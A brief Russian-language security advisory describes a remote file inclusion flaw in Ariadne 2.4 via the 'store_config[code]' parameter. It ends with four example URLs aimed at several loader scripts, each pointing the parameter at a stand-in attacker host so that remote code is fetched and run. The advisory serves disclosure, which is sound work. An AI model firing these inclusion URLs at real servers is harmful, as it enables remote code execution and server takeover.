Программа: Ariadne 2.4
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе.
Уязвимость существует из-за ошибки в обработке входных данных в параметре «store_config[code]» множественными сценариями. Атакующий может выполнить произвольный сценарий с привилегиями запущенного Web сервера.
Пример:
www.target.com/script_path/lib/includes/loader.cmd.php?store_config [code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.ftp.php?store_config [code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.soap.php?store_config [code]=http://evilscripts ?
www.target.com/script_path/lib/includes/loader.web.php?store_config [code]=http://evilscripts ?
